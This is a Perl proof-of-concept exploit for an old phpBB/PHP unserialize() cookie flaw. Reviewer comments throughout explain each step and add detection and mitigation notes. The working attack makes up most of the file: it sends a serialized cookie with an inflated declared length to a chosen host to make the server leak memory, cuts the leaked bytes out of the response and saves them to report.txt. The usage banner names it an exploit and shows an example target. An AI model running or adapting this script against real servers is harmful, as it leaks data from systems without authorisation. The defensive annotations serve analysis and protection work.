#!/usr/bin/perl
# Proof-of-concept client for the phpBB / PHP unserialize() cookie issue.
# Affected versions, as written by the author: "Phpbb < 2.011 & php < 4.39".
# NOTE(review): presumably phpBB 2.0.11 and PHP 4.3.9 are meant -- confirm the
# fixed releases against the vendor advisories before relying on them.
# Code by Alpha (netsh@163.com)
# qq:24266683
# Welcome to Http://www.cnwill.com/
#
# What the script does, as far as this file shows:
#   1. builds one HTTP GET request whose "<prefix>_data" cookie carries a
#      URL-encoded serialized PHP string, s:<buffersize>:"test1"; -- the
#      declared length is chosen by the caller while the payload is 5 bytes;
#   2. sends it over a plain TCP socket and reads the complete response;
#   3. cuts a fixed window out of the response, collapses %XX escapes and
#      runs of dots, and appends what is left to report.txt.
# NOTE(review): presumably a vulnerable unserialize() trusts the declared
# length, so the response echoes bytes lying beyond the supplied string; the
# server side is not visible in this file -- confirm against the advisory.
#
# Defender notes (every trait below is taken from the request built here):
#   * Detection: a "<prefix>_data" cookie whose serialized string declares a
#     length far larger than its quoted content (the usage example sends
#     s:30000:%22test1%22%3b); the constant "_sid" value
#     1cfd759c33ba2a45b994c7b7cfd948ec; Set-Cookie style attributes
#     (expires/path/domain) inside a request "Cookie:" header; header lines
#     terminated by a bare LF; "Accept-Language: fr" with the MSIE 6.0 UA.
#   * Mitigation: run phpBB and PHP releases that contain the fix. More
#     generally, do not hand client-supplied cookie data to unserialize();
#     use a plain data format, or verify a keyed MAC before parsing.
#
# NOTE(review): the script runs without "use strict" / "use warnings"; every
# variable outside sub connect is a package global.
use IO::Socket;

# Clears the console. 'cls' is a Windows command; the return value of
# system() is ignored, so on other platforms the call simply fails.
system('cls');

# Exactly five arguments are required; otherwise print the usage banner and
# leave with exit status 1.
if (@ARGV != 5) {
    print "\n";
    print "*****************************************************\n";
    print "Thanks use this programme\n";
    print "This is Phpbb < 2.011 &php < 4.39 unserialize () exploit.\n\n";
    print "Use£º\n$0 host port path buffersize cooike\n\n";
    print "e.g :\n$0 www.*.org.cn 80 /html/forum/ 30000 phpbb2mysql\n\n";
    print "Code by Alpha\n";
    print "*****************************************************\n";
    exit(1);
}

# Positional arguments: host, port, forum path, declared string length and
# cookie-name prefix. @ARGV[n] is a one-element array slice; in a scalar
# assignment it yields that element, so this works, although $ARGV[n] is the
# scalar form. The values are used as given, without any validation.
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[2];
$size = @ARGV[3];
$cookie=@ARGV[4];
# Hard-coded host override left commented out by the author.
#$host="www.cosoft.org.cn";

# The complete request text. The first Cookie header is the relevant one:
# "<prefix>_data" holds s:$size:"test1"; in URL-encoded form, so the length
# field comes straight from the command line. The second Cookie header sends
# a constant "<prefix>_sid" value.
$req = "GET $path HTTP/1.1\n".
"Host: $host\n".
"Cookie: $cookie"."_data=s:$size:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=$host\n".
"Cookie: $cookie"."_sid=1cfd759c33ba2a45b994c7b7cfd948ec; path=/; domain=$host\n".
"Accept-Language: fr\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n".
"Connection: close\n\n";
# Debug aid left by the author: print the request and stop.
#print "$req";
#exit;

print "######Waitting...........\n\n";

# The & sigil selects the user-defined sub connect below rather than the
# built-in connect(); called without parentheses it also passes the current
# @_ through, which the sub does not use.
@res = &connect;

# Join the response lines into one string.
$aaa =join ('',@res);
# Keep 2*$size characters starting at offset 360 of the raw response (status
# line and headers included).
# NOTE(review): 360 is an undocumented magic number chosen by the author.
$aaa=substr ($aaa,360, 2*$size);
# Replace every "%" plus the two characters after it with a single dot.
# NOTE(review): presumably this drops URL-encoded bytes from an echoed
# cookie value -- confirm against a captured response.
$aaa=~s/%../\./g;
# Collapse runs of dots: four to one, three to one (twice), two to one
# (twice). The order of these substitutions affects the result.
$aaa=~s/\.\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\.\./\./g;
$aaa=~s/\.\./\./g;
$aaa=~s/\.\./\./g;
# A dot, any single character and another dot become a line break.
$aaa=~s/\..\../\n/g;
# Squeeze doubled newlines, two passes.
$aaa=~s/\n\n/\n/g;
$aaa=~s/\n\n/\n/g;

# The extracted text can be large, so it is appended to report.txt in the
# current directory instead of being printed.
# NOTE(review): two-argument open with a bareword handle and no result
# check; if the file cannot be opened the print fails silently and the
# success message below is still shown.
open(file,">>report.txt");
print file $aaa;
close(file);
print "ok,the result is in the report.txt,you can see it now!\n\n";
print "*****************************************************\n";

# connect: open a TCP connection to $host:$port, send $req and return the
# response as a list of lines.
# Reads the package globals $host, $port and $req; takes no arguments.
# Dies with a message naming $host when the socket cannot be created.
# The list-context read returns once the peer closes the connection (the
# request asks for "Connection: close").
sub connect {
    my $connection = IO::Socket::INET->new(Proto =>"tcp",
        PeerAddr =>$host,
        PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
    print $connection $req;
    my @res = <$connection>;
    close $connection;
    return @res;
}